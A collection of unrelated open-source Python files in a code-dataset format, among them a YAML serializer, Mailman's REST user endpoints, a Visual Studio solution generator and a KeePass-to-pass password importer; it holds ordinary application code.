logger = logging.getLogger(__name__)
logger.info('Starting (using level {})'.format(log_level_text.upper()))
# Log warnings
for warning in log_warnings:
logger.warn(warning)
|
ktarrant/options_csv | refs/heads/master | journal/trades/apps.py | 1 | from django.apps import AppConfig
class TradesConfig(AppConfig):
name = 'trades'
|
jounex/hue | refs/heads/master | desktop/core/ext-py/PyYAML-3.09/lib3/yaml/serializer.py | 293 |
__all__ = ['Serializer', 'SerializerError']
from .error import YAMLError
from .events import *
from .nodes import *
class SerializerError(YAMLError):
pass
class Serializer:
ANCHOR_TEMPLATE = 'id%03d'
def __init__(self, encoding=None,
explicit_start=None, explicit_end=None, version=None, tags=None):
self.use_encoding = encoding
self.use_explicit_start = explicit_start
self.use_explicit_end = explicit_end
self.use_version = version
self.use_tags = tags
self.serialized_nodes = {}
self.anchors = {}
self.last_anchor_id = 0
self.closed = None
def open(self):
if self.closed is None:
self.emit(StreamStartEvent(encoding=self.use_encoding))
self.closed = False
elif self.closed:
raise SerializerError("serializer is closed")
else:
raise SerializerError("serializer is already opened")
def close(self):
if self.closed is None:
raise SerializerError("serializer is not opened")
elif not self.closed:
self.emit(StreamEndEvent())
self.closed = True
#def __del__(self):
# self.close()
def serialize(self, node):
if self.closed is None:
raise SerializerError("serializer is not opened")
elif self.closed:
raise SerializerError("serializer is closed")
self.emit(DocumentStartEvent(explicit=self.use_explicit_start,
version=self.use_version, tags=self.use_tags))
self.anchor_node(node)
self.serialize_node(node, None, None)
self.emit(DocumentEndEvent(explicit=self.use_explicit_end))
self.serialized_nodes = {}
self.anchors = {}
self.last_anchor_id = 0
def anchor_node(self, node):
if node in self.anchors:
if self.anchors[node] is None:
self.anchors[node] = self.generate_anchor(node)
else:
self.anchors[node] = None
if isinstance(node, SequenceNode):
for item in node.value:
self.anchor_node(item)
elif isinstance(node, MappingNode):
for key, value in node.value:
self.anchor_node(key)
self.anchor_node(value)
def generate_anchor(self, node):
self.last_anchor_id += 1
return self.ANCHOR_TEMPLATE % self.last_anchor_id
def serialize_node(self, node, parent, index):
alias = self.anchors[node]
if node in self.serialized_nodes:
self.emit(AliasEvent(alias))
else:
self.serialized_nodes[node] = True
self.descend_resolver(parent, index)
if isinstance(node, ScalarNode):
detected_tag = self.resolve(ScalarNode, node.value, (True, False))
default_tag = self.resolve(ScalarNode, node.value, (False, True))
implicit = (node.tag == detected_tag), (node.tag == default_tag)
self.emit(ScalarEvent(alias, node.tag, implicit, node.value,
style=node.style))
elif isinstance(node, SequenceNode):
implicit = (node.tag
== self.resolve(SequenceNode, node.value, True))
self.emit(SequenceStartEvent(alias, node.tag, implicit,
flow_style=node.flow_style))
index = 0
for item in node.value:
self.serialize_node(item, node, index)
index += 1
self.emit(SequenceEndEvent())
elif isinstance(node, MappingNode):
implicit = (node.tag
== self.resolve(MappingNode, node.value, True))
self.emit(MappingStartEvent(alias, node.tag, implicit,
flow_style=node.flow_style))
for key, value in node.value:
self.serialize_node(key, node, None)
self.serialize_node(value, node, key)
self.emit(MappingEndEvent())
self.ascend_resolver()
|
ahmedaljazzar/edx-platform | refs/heads/master | openedx/core/djangoapps/dark_lang/admin.py | 24 | """
Admin site bindings for dark_lang
"""
from config_models.admin import ConfigurationModelAdmin
from django.contrib import admin
from openedx.core.djangoapps.dark_lang.models import DarkLangConfig
admin.site.register(DarkLangConfig, ConfigurationModelAdmin)
|
joomel1/phantomjs | refs/heads/master | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/steps/postdiffforcommit.py | 147 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from webkitpy.tool.steps.abstractstep import AbstractStep
class PostDiffForCommit(AbstractStep):
def run(self, state):
self._tool.bugs.add_patch_to_bug(
state["bug_id"],
self.cached_lookup(state, "diff"),
"Patch for landing",
mark_for_review=False,
mark_for_landing=True)
|
kryptohash/kryptohash | refs/heads/master | share/qt/make_spinner.py | 563 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
SRC='img/reload.png'
TMPDIR='../../src/qt/res/movies/'
TMPNAME='spinner-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)
im_src = Image.open(SRC)
if CLOCKWISE:
im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)
def frame_to_filename(frame):
return path.join(TMPDIR, TMPNAME % frame)
frame_files = []
for frame in xrange(NUMFRAMES):
rotation = (frame + 0.5) / NUMFRAMES * 360.0
if CLOCKWISE:
rotation = -rotation
im_new = im_src.rotate(rotation, Image.BICUBIC)
im_new.thumbnail(DSIZE, Image.ANTIALIAS)
outfile = frame_to_filename(frame)
im_new.save(outfile, 'png')
frame_files.append(outfile)
|
trevor/mailman3 | refs/heads/master | src/mailman/rest/users.py | 1 | # Copyright (C) 2011-2014 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""REST for users."""
from __future__ import absolute_import, print_function, unicode_literals
__metaclass__ = type
__all__ = [
'AUser',
'AllUsers',
]
from passlib.utils import generate_password as generate
from restish import http, resource
from uuid import UUID
from zope.component import getUtility
from mailman.config import config
from mailman.core.errors import (
ReadOnlyPATCHRequestError, UnknownPATCHRequestError)
from mailman.interfaces.address import ExistingAddressError
from mailman.interfaces.usermanager import IUserManager
from mailman.rest.addresses import UserAddresses
from mailman.rest.helpers import (
CollectionMixin, GetterSetter, PATCH, etag, no_content, paginate, path_to)
from mailman.rest.preferences import Preferences
from mailman.rest.validator import PatchValidator, Validator
# Attributes of a user which can be changed via the REST API.
class PasswordEncrypterGetterSetter(GetterSetter):
def __init__(self):
super(PasswordEncrypterGetterSetter, self).__init__(
config.password_context.encrypt)
def get(self, obj, attribute):
assert attribute == 'cleartext_password'
super(PasswordEncrypterGetterSetter, self).get(obj, 'password')
def put(self, obj, attribute, value):
assert attribute == 'cleartext_password'
super(PasswordEncrypterGetterSetter, self).put(obj, 'password', value)
ATTRIBUTES = dict(
display_name=GetterSetter(unicode),
cleartext_password=PasswordEncrypterGetterSetter(),
)
class _UserBase(resource.Resource, CollectionMixin):
"""Shared base class for user representations."""
def _resource_as_dict(self, user):
"""See `CollectionMixin`."""
# The canonical URL for a user is their unique user id, although we
# can always look up a user based on any registered and validated
# email address associated with their account. The user id is a UUID,
# but we serialize its integer equivalent.
user_id = user.user_id.int
resource = dict(
user_id=user_id,
created_on=user.created_on,
self_link=path_to('users/{0}'.format(user_id)),
)
# Add the password attribute, only if the user has a password. Same
# with the real name. These could be None or the empty string.
if user.password:
resource['password'] = user.password
if user.display_name:
resource['display_name'] = user.display_name
return resource
@paginate
def _get_collection(self, request):
"""See `CollectionMixin`."""
return list(getUtility(IUserManager).users)
class AllUsers(_UserBase):
"""The users."""
@resource.GET()
def collection(self, request):
"""/users"""
resource = self._make_collection(request)
return http.ok([], etag(resource))
@resource.POST()
def create(self, request):
"""Create a new user."""
try:
validator = Validator(email=unicode,
display_name=unicode,
password=unicode,
_optional=('display_name', 'password'))
arguments = validator(request)
except ValueError as error:
return http.bad_request([], str(error))
# We can't pass the 'password' argument to the user creation method,
# so strip that out (if it exists), then create the user, adding the
# password after the fact if successful.
password = arguments.pop('password', None)
try:
user = getUtility(IUserManager).create_user(**arguments)
except ExistingAddressError as error:
return http.bad_request(
[], b'Address already exists: {0}'.format(error.address))
if password is None:
# This will have to be reset since it cannot be retrieved.
password = generate(int(config.passwords.password_length))
user.password = config.password_context.encrypt(password)
location = path_to('users/{0}'.format(user.user_id.int))
return http.created(location, [], None)
class AUser(_UserBase):
"""A user."""
def __init__(self, user_identifier):
"""Get a user by various type of identifiers.
:param user_identifier: The identifier used to retrieve the user. The
identifier may either be an integer user-id, or an email address
controlled by the user. The type of identifier is auto-detected
by looking for an `@` symbol, in which case it's taken as an email
address, otherwise it's assumed to be an integer.
:type user_identifier: string
"""
user_manager = getUtility(IUserManager)
if '@' in user_identifier:
self._user = user_manager.get_user(user_identifier)
else:
# The identifier is the string representation of an integer that
# must be converted to a UUID.
try:
user_id = UUID(int=int(user_identifier))
except ValueError:
self._user = None
else:
self._user = user_manager.get_user_by_id(user_id)
@resource.GET()
def user(self, request):
"""Return a single user end-point."""
if self._user is None:
return http.not_found()
return http.ok([], self._resource_as_json(self._user))
@resource.child()
def addresses(self, request, segments):
"""/users/<uid>/addresses"""
if self._user is None:
return http.not_found()
return UserAddresses(self._user)
@resource.DELETE()
def delete_user(self, request):
"""Delete the named user, all her memberships, and addresses."""
if self._user is None:
return http.not_found()
for member in self._user.memberships.members:
member.unsubscribe()
user_manager = getUtility(IUserManager)
for address in self._user.addresses:
user_manager.delete_address(address)
user_manager.delete_user(self._user)
return no_content()
@resource.child()
def preferences(self, request, segments):
"""/addresses/<email>/preferences"""
if len(segments) != 0:
return http.bad_request()
if self._user is None:
return http.not_found()
child = Preferences(
self._user.preferences,
'users/{0}'.format(self._user.user_id.int))
return child, []
@PATCH()
def patch_update(self, request):
"""Patch the user's configuration (i.e. partial update)."""
if self._user is None:
return http.not_found()
try:
validator = PatchValidator(request, ATTRIBUTES)
except UnknownPATCHRequestError as error:
return http.bad_request(
[], b'Unknown attribute: {0}'.format(error.attribute))
except ReadOnlyPATCHRequestError as error:
return http.bad_request(
[], b'Read-only attribute: {0}'.format(error.attribute))
validator.update(self._user, request)
return no_content()
@resource.PUT()
def put_update(self, request):
"""Put the user's configuration (i.e. full update)."""
if self._user is None:
return http.not_found()
validator = Validator(**ATTRIBUTES)
try:
validator.update(self._user, request)
except UnknownPATCHRequestError as error:
return http.bad_request(
[], b'Unknown attribute: {0}'.format(error.attribute))
except ReadOnlyPATCHRequestError as error:
return http.bad_request(
[], b'Read-only attribute: {0}'.format(error.attribute))
except ValueError as error:
return http.bad_request([], str(error))
return no_content()
@resource.child('login')
def login(self, request, segments):
"""Log the user in, sort of, by verifying a given password."""
if self._user is None:
return http.not_found()
# We do not want to encrypt the plaintext password given in the POST
# data. That would hash the password, but we need to have the
# plaintext in order to pass into passlib.
validator = Validator(cleartext_password=GetterSetter(unicode))
try:
values = validator(request)
except ValueError as error:
return http.bad_request([], str(error))
is_valid, new_hash = config.password_context.verify(
values['cleartext_password'], self._user.password)
if is_valid:
if new_hash is not None:
self._user.password = new_hash
return no_content()
return http.forbidden()
|
scalado/contexo | refs/heads/master | contexo/cmdline/ctx2tengil.py | 1 | #!/usr/bin/env python
###############################################################################
# #
# ctx2make.py #
# Generate GNU Makefiles from Contexo views - (c) Scalado AB 2010 #
# #
# Authors: Thomas Eriksson (thomas.eriksson@scalado.com) #
# Ulf Holmstedt (ulf.holmstedt@scalado.com) #
# Manuel Astudillo (manuel.astudillo@scalado.com) #
# License GPL v2. See LICENSE.txt. #
# ------------ #
# #
# #
###############################################################################
# coding=UTF-8
# TODO:
# * change output dir to absolute path, -o argument?
#
# cygwin make does not handle mixed paths in target definitions well:
#
# C:/foo/bar.obj: C:/foo/bar.c
#
# instead we need to write them as:
# $(CYGPREFIX)/c/foo/bar.obj: $(CYGPREFIX)/c/foo/bar.c
#
# CYGPREFIX is set to /cygdrive if in cygwin, empty string if in MSYS
# this makes makefiles work on both cygwin and msys
#
# the compiler cannot handle cygwin/msys paths, so we need to retranslate them
# to mixed mode: cc -c C:/foo/bar.c -o C:/foo/bar.o
import tempfile
import logging
import logging.handlers
import os
import os.path
import sys
import shutil
import platform
import posixpath
import subprocess
from contexo import ctx2_common
from contexo import ctx_view
from contexo import ctx_cfg
from contexo import ctx_envswitch
from contexo import ctx_common
from contexo import ctx_comp
from contexo import ctx_sysinfo
from contexo import ctx_cmod
from contexo import ctx_base
from contexo import ctx_envswitch
from contexo import ctx_bc
from contexo import ctx_config
def main(argv):
buildItems = list()
envFile = ""
bcFile = ""
addInc = ""
outputDir = ""
outputFile = ""
outputName = ""
inputName = ""
viewDir = ""
nextArgIsBC = False
linkHeaders = True
nextArgIsInputName = False
nextArgIsOutputName = False
nextArgIsOutputFile = False
parsedAllOptions = False
firstArg = True
for arg in argv:
if firstArg:
firstArg = False
continue
if arg == '-h':
print >>sys.stderr, 'help:'
print >>sys.stderr, '-b <BCFILE>, .bc file to use'
print >>sys.stderr, '-in <INPUT_NAME>, input name'
print >>sys.stderr, '-on <OUTPUT_NAME>, output name'
print >>sys.stderr, '-o <OUTPUT_FILE>, resulting output file'
sys.exit(1)
if nextArgIsOutputName:
outputName = arg
nextArgIsOutputName = False
continue
if nextArgIsBC:
bcFile = arg
nextArgIsBC = False
continue
if nextArgIsInputName:
inputName = arg
nextArgIsInputName = False
continue
if nextArgIsOutputFile:
outputFile = arg
nextArgIsOutputFile = False
continue
if not parsedAllOptions:
if arg == '-on':
nextArgIsOutputName = True
continue
if arg == '-in':
nextArgIsInputName = True
continue
if arg == '-o':
nextArgIsOutputFile = True
continue
if arg == '-b':
nextArgIsBC = True
continue
parsedAllOptions = True
if outputFile == "":
print >>sys.stderr, 'must have \'-o\' argument'
sys.exit(1)
if bcFile == "":
print >>sys.stderr, 'must have -b argument'
sys.exit(1)
if outputName == "":
print >>sys.stderr, 'must have \'-on\' argument'
sys.exit(1)
if inputName == "":
print >>sys.stderr, 'must have \'-in\' argument'
sys.exit(1)
if arg[-5:] != ".comp" and arg[0] != '@':
print >>sys.stderr, 'arguments must be either comp(s) or listfile(s) containing comp(s)'
sys.exit(1)
buildItems.append(arg)
if len(buildItems) == 0:
print >>sys.stderr, 'must have at least one listfile or comp file as argument'
sys.exit(1)
argDict = dict()
genTengilFile(outputFile = outputFile, viewDir = viewDir, outputName = outputName, inputName = inputName, buildItems = buildItems, bcFile = bcFile)
logging.basicConfig(format = '%(asctime)s %(levelname)-8s %(message)s',
datefmt='%H:%M:%S',
level = logging.DEBUG);
def genTengilFile(outputFile = str(), viewDir = str(), outputName = str(), inputName = str(), buildItems = list(), bcFile = str()):
launch_path = posixpath.abspath('.')
view_dir = ctx2_common.get_view_dir(viewDir)
obj_dir = view_dir + os.sep + '.ctx/obj'
envLayout = None
oldEnv = None
contexo_config_path = posixpath.join( ctx_common.getUserCfgDir(), ctx_sysinfo.CTX_CONFIG_FILENAME )
cfgFile = ctx_cfg.CFGFile( contexo_config_path )
cview = ctx_view.CTXView(view_dir, validate=False)
bc = ctx2_common.getBuildConfiguration(cview, bcFile, cfgFile)
comps = ctx2_common.expand_list_files(cview, buildItems)
components = list()
modules = list()
components = ctx2_common.create_components(comps, cview.getItemPaths('comp'), obj_dir, launch_path)
for comp in components:
for library, compModules in comp.libraries.items():
modules.extend(compModules)
buildTests = True
librarySources, includes = ctx2_common.parseComps(cview, view_dir, buildTests, bc, components)
tempdir = tempfile.mkdtemp(prefix='ctx2tengil')
for file in includes:
shutil.copy(file, tempdir)
for sources in librarySources.values():
for file in sources:
shutil.copy(file, tempdir)
args = " ".join(['grep', '-h', inputName, tempdir + os.sep + '*', '|', 'grep', '-v', '"#define"' + '>', outputFile])
print args
if subprocess.call(args, shell=True) != 0:
sys.exit()
args = " ".join(['sed', '-i', 's/' + inputName + '/' + outputName + '/g', outputFile])
print args
if subprocess.Popen(args, shell=True) != 0:
sys.exit()
shutil.rmtree(tempdir)
main(sys.argv)
|
ampax/edx-platform | refs/heads/master | lms/djangoapps/debug/management/commands/__init__.py | 12133432 | |
matsumoto-r/synciga | refs/heads/master | src/tools/gyp/pylib/gyp/MSVSNew.py | 225 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""New implementation of Visual Studio project generation for SCons."""
import os
import random
import gyp.common
# hashlib is supplied as of Python 2.5 as the replacement interface for md5
# and other secure hashes. In 2.6, md5 is deprecated. Import hashlib if
# available, avoiding a deprecation warning under 2.6. Import md5 otherwise,
# preserving 2.4 compatibility.
try:
import hashlib
_new_md5 = hashlib.md5
except ImportError:
import md5
_new_md5 = md5.new
# Initialize random number generator
random.seed()
# GUIDs for project types
ENTRY_TYPE_GUIDS = {
'project': '{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}',
'folder': '{2150E333-8FDC-42A3-9474-1A3956D46DE8}',
}
#------------------------------------------------------------------------------
# Helper functions
def MakeGuid(name, seed='msvs_new'):
"""Returns a GUID for the specified target name.
Args:
name: Target name.
seed: Seed for MD5 hash.
Returns:
A GUID-line string calculated from the name and seed.
This generates something which looks like a GUID, but depends only on the
name and seed. This means the same name/seed will always generate the same
GUID, so that projects and solutions which refer to each other can explicitly
determine the GUID to refer to explicitly. It also means that the GUID will
not change when the project for a target is rebuilt.
"""
# Calculate a MD5 signature for the seed and name.
d = _new_md5(str(seed) + str(name)).hexdigest().upper()
# Convert most of the signature to GUID form (discard the rest)
guid = ('{' + d[:8] + '-' + d[8:12] + '-' + d[12:16] + '-' + d[16:20]
+ '-' + d[20:32] + '}')
return guid
#------------------------------------------------------------------------------
class MSVSSolutionEntry(object):
def __cmp__(self, other):
# Sort by name then guid (so things are in order on vs2008).
return cmp((self.name, self.get_guid()), (other.name, other.get_guid()))
class MSVSFolder(MSVSSolutionEntry):
"""Folder in a Visual Studio project or solution."""
def __init__(self, path, name = None, entries = None,
guid = None, items = None):
"""Initializes the folder.
Args:
path: Full path to the folder.
name: Name of the folder.
entries: List of folder entries to nest inside this folder. May contain
Folder or Project objects. May be None, if the folder is empty.
guid: GUID to use for folder, if not None.
items: List of solution items to include in the folder project. May be
None, if the folder does not directly contain items.
"""
if name:
self.name = name
else:
# Use last layer.
self.name = os.path.basename(path)
self.path = path
self.guid = guid
# Copy passed lists (or set to empty lists)
self.entries = sorted(list(entries or []))
self.items = list(items or [])
self.entry_type_guid = ENTRY_TYPE_GUIDS['folder']
def get_guid(self):
if self.guid is None:
# Use consistent guids for folders (so things don't regenerate).
self.guid = MakeGuid(self.path, seed='msvs_folder')
return self.guid
#------------------------------------------------------------------------------
class MSVSProject(MSVSSolutionEntry):
"""Visual Studio project."""
def __init__(self, path, name = None, dependencies = None, guid = None,
spec = None, build_file = None, config_platform_overrides = None,
fixpath_prefix = None):
"""Initializes the project.
Args:
path: Absolute path to the project file.
name: Name of project. If None, the name will be the same as the base
name of the project file.
dependencies: List of other Project objects this project is dependent
upon, if not None.
guid: GUID to use for project, if not None.
spec: Dictionary specifying how to build this project.
build_file: Filename of the .gyp file that the vcproj file comes from.
config_platform_overrides: optional dict of configuration platforms to
used in place of the default for this target.
fixpath_prefix: the path used to adjust the behavior of _fixpath
"""
self.path = path
self.guid = guid
self.spec = spec
self.build_file = build_file
# Use project filename if name not specified
self.name = name or os.path.splitext(os.path.basename(path))[0]
# Copy passed lists (or set to empty lists)
self.dependencies = list(dependencies or [])
self.entry_type_guid = ENTRY_TYPE_GUIDS['project']
if config_platform_overrides:
self.config_platform_overrides = config_platform_overrides
else:
self.config_platform_overrides = {}
self.fixpath_prefix = fixpath_prefix
self.msbuild_toolset = None
def set_dependencies(self, dependencies):
self.dependencies = list(dependencies or [])
def get_guid(self):
if self.guid is None:
# Set GUID from path
# TODO(rspangler): This is fragile.
# 1. We can't just use the project filename sans path, since there could
# be multiple projects with the same base name (for example,
# foo/unittest.vcproj and bar/unittest.vcproj).
# 2. The path needs to be relative to $SOURCE_ROOT, so that the project
# GUID is the same whether it's included from base/base.sln or
# foo/bar/baz/baz.sln.
# 3. The GUID needs to be the same each time this builder is invoked, so
# that we don't need to rebuild the solution when the project changes.
# 4. We should be able to handle pre-built project files by reading the
# GUID from the files.
self.guid = MakeGuid(self.name)
return self.guid
def set_msbuild_toolset(self, msbuild_toolset):
self.msbuild_toolset = msbuild_toolset
#------------------------------------------------------------------------------
class MSVSSolution:
"""Visual Studio solution."""
def __init__(self, path, version, entries=None, variants=None,
websiteProperties=True):
"""Initializes the solution.
Args:
path: Path to solution file.
version: Format version to emit.
entries: List of entries in solution. May contain Folder or Project
objects. May be None, if the folder is empty.
variants: List of build variant strings. If none, a default list will
be used.
websiteProperties: Flag to decide if the website properties section
is generated.
"""
self.path = path
self.websiteProperties = websiteProperties
self.version = version
# Copy passed lists (or set to empty lists)
self.entries = list(entries or [])
if variants:
# Copy passed list
self.variants = variants[:]
else:
# Use default
self.variants = ['Debug|Win32', 'Release|Win32']
# TODO(rspangler): Need to be able to handle a mapping of solution config
# to project config. Should we be able to handle variants being a dict,
# or add a separate variant_map variable? If it's a dict, we can't
# guarantee the order of variants since dict keys aren't ordered.
# TODO(rspangler): Automatically write to disk for now; should delay until
# node-evaluation time.
self.Write()
def Write(self, writer=gyp.common.WriteOnDiff):
"""Writes the solution file to disk.
Raises:
IndexError: An entry appears multiple times.
"""
# Walk the entry tree and collect all the folders and projects.
all_entries = set()
entries_to_check = self.entries[:]
while entries_to_check:
e = entries_to_check.pop(0)
# If this entry has been visited, nothing to do.
if e in all_entries:
continue
all_entries.add(e)
# If this is a folder, check its entries too.
if isinstance(e, MSVSFolder):
entries_to_check += e.entries
all_entries = sorted(all_entries)
# Open file and print header
f = writer(self.path)
f.write('Microsoft Visual Studio Solution File, '
'Format Version %s\r\n' % self.version.SolutionVersion())
f.write('# %s\r\n' % self.version.Description())
# Project entries
sln_root = os.path.split(self.path)[0]
for e in all_entries:
relative_path = gyp.common.RelativePath(e.path, sln_root)
# msbuild does not accept an empty folder_name.
# use '.' in case relative_path is empty.
folder_name = relative_path.replace('/', '\\') or '.'
f.write('Project("%s") = "%s", "%s", "%s"\r\n' % (
e.entry_type_guid, # Entry type GUID
e.name, # Folder name
folder_name, # Folder name (again)
e.get_guid(), # Entry GUID
))
# TODO(rspangler): Need a way to configure this stuff
if self.websiteProperties:
f.write('\tProjectSection(WebsiteProperties) = preProject\r\n'
'\t\tDebug.AspNetCompiler.Debug = "True"\r\n'
'\t\tRelease.AspNetCompiler.Debug = "False"\r\n'
'\tEndProjectSection\r\n')
if isinstance(e, MSVSFolder):
if e.items:
f.write('\tProjectSection(SolutionItems) = preProject\r\n')
for i in e.items:
f.write('\t\t%s = %s\r\n' % (i, i))
f.write('\tEndProjectSection\r\n')
if isinstance(e, MSVSProject):
if e.dependencies:
f.write('\tProjectSection(ProjectDependencies) = postProject\r\n')
for d in e.dependencies:
f.write('\t\t%s = %s\r\n' % (d.get_guid(), d.get_guid()))
f.write('\tEndProjectSection\r\n')
f.write('EndProject\r\n')
# Global section
f.write('Global\r\n')
# Configurations (variants)
f.write('\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n')
for v in self.variants:
f.write('\t\t%s = %s\r\n' % (v, v))
f.write('\tEndGlobalSection\r\n')
# Sort config guids for easier diffing of solution changes.
config_guids = []
config_guids_overrides = {}
for e in all_entries:
if isinstance(e, MSVSProject):
config_guids.append(e.get_guid())
config_guids_overrides[e.get_guid()] = e.config_platform_overrides
config_guids.sort()
f.write('\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n')
for g in config_guids:
for v in self.variants:
nv = config_guids_overrides[g].get(v, v)
# Pick which project configuration to build for this solution
# configuration.
f.write('\t\t%s.%s.ActiveCfg = %s\r\n' % (
g, # Project GUID
v, # Solution build configuration
nv, # Project build config for that solution config
))
# Enable project in this solution configuration.
f.write('\t\t%s.%s.Build.0 = %s\r\n' % (
g, # Project GUID
v, # Solution build configuration
nv, # Project build config for that solution config
))
f.write('\tEndGlobalSection\r\n')
# TODO(rspangler): Should be able to configure this stuff too (though I've
# never seen this be any different)
f.write('\tGlobalSection(SolutionProperties) = preSolution\r\n')
f.write('\t\tHideSolutionNode = FALSE\r\n')
f.write('\tEndGlobalSection\r\n')
# Folder mappings
# TODO(rspangler): Should omit this section if there are no folders
f.write('\tGlobalSection(NestedProjects) = preSolution\r\n')
for e in all_entries:
if not isinstance(e, MSVSFolder):
continue # Does not apply to projects, only folders
for subentry in e.entries:
f.write('\t\t%s = %s\r\n' % (subentry.get_guid(), e.get_guid()))
f.write('\tEndGlobalSection\r\n')
f.write('EndGlobal\r\n')
f.close()
|
ampling/pass | refs/heads/passmenu_multi-clip | contrib/importers/keepass2pass.py | 11 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Stefan Simroth <stefan.simroth@gmail.com>. All Rights Reserved.
# Based on the script for KeepassX by Juhamatti Niemelä <iiska@iki.fi>.
# This file is licensed under the GPLv2+. Please see COPYING for more information.
#
# Usage:
# ./keepass2pass.py -f export.xml
# By default, takes the name of the root element and puts all passwords in there, but you can disable this:
# ./keepass2pass.py -f export.xml -r ""
# Or you can use another root folder:
# ./keepass2pass.py -f export.xml -r foo
#
# Features:
# * This script can handle duplicates and will merge them.
# * Besides the password also the fields 'UserName', 'URL' and 'Notes' (comment) will be inserted.
# * You get a warning if an entry has no password, but it will still insert it.
import getopt, sys
from subprocess import Popen, PIPE
from xml.etree import ElementTree
def pass_import_entry(path, data):
""" Import new password entry to password-store using pass insert command """
proc = Popen(['pass', 'insert', '--multiline', path], stdin=PIPE, stdout=PIPE)
proc.communicate(data.encode('utf8'))
proc.wait()
def get_value(elements, node_text):
for element in elements:
for child in element.findall('Key'):
if child.text == node_text:
return element.find('Value').text
return ''
def path_for(element, path=''):
""" Generate path name from elements title and current path """
if element.tag == 'Entry':
title = get_value(element.findall("String"), "Title")
elif element.tag == 'Group':
title = element.find('Name').text
else: title = ''
if path == '': return title
else: return '/'.join([path, title])
def password_data(element, path=''):
""" Return password data and additional info if available from password entry element. """
data = ""
password = get_value(element.findall('String'), 'Password')
if password is not None: data = password + "\n"
else:
print "[WARN] No password: %s" % path_for(element, path)
for field in ['UserName', 'URL', 'Notes']:
value = get_value(element, field)
if value is not None and not len(value) == 0:
data = "%s%s: %s\n" % (data, field, value)
return data
def import_entry(entries, element, path=''):
element_path = path_for(element, path)
if entries.has_key(element_path):
print "[INFO] Duplicate needs merging: %s" % element_path
existing_data = entries[element_path]
data = "%s---------\nPassword: %s" % (existing_data, password_data(element))
else:
data = password_data(element, path)
entries[element_path] = data
def import_group(entries, element, path='', npath=None):
""" Import all entries and sub-groups from given group """
if npath is None:
npath = path_for(element, path)
for group in element.findall('Group'):
import_group(entries, group, npath)
for entry in element.findall('Entry'):
import_entry(entries, entry, npath)
def import_passwords(xml_file, root_path=None):
""" Parse given Keepass2 XML file and import password groups from it """
print "[>>>>] Importing passwords from file %s" % xml_file
print "[INFO] Root path: %s" % root_path
entries = dict()
with open(xml_file) as xml:
text = xml.read()
xml_tree = ElementTree.XML(text)
root = xml_tree.find('Root')
root_group = root.find('Group')
import_group(entries, root_group, '', root_path)
password_count = 0
for path, data in sorted(entries.iteritems()):
sys.stdout.write("[>>>>] Importing %s ... " % path.encode("utf-8"))
pass_import_entry(path, data)
sys.stdout.write("OK\n")
password_count += 1
print "[ OK ] Done. Imported %i passwords." % password_count
def usage():
""" Print usage """
print "Usage: %s -f XML_FILE" % (sys.argv[0])
print "Optional:"
print " -r ROOT_PATH Different root path to use than the one in xml file, use \"\" for none"
def main(argv):
try:
opts, args = getopt.gnu_getopt(argv, "f:r:")
except getopt.GetoptError as err:
print str(err)
usage()
sys.exit(2)
xml_file = None
root_path = None
for opt, arg in opts:
if opt in "-f":
xml_file = arg
if opt in "-r":
root_path = arg
if xml_file is not None:
import_passwords(xml_file, root_path)
else:
usage()
sys.exit(2)
if __name__ == '__main__':
main(sys.argv[1:])
|
wdwvt1/scikit-bio | refs/heads/master | skbio/sequence/tests/test_iupac_sequence.py | 3 | # ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import six
from unittest import TestCase, main
import numpy as np
import numpy.testing as npt
from skbio.sequence._iupac_sequence import IUPACSequence
from skbio.util._decorator import classproperty
class ExampleIUPACSequence(IUPACSequence):
@classproperty
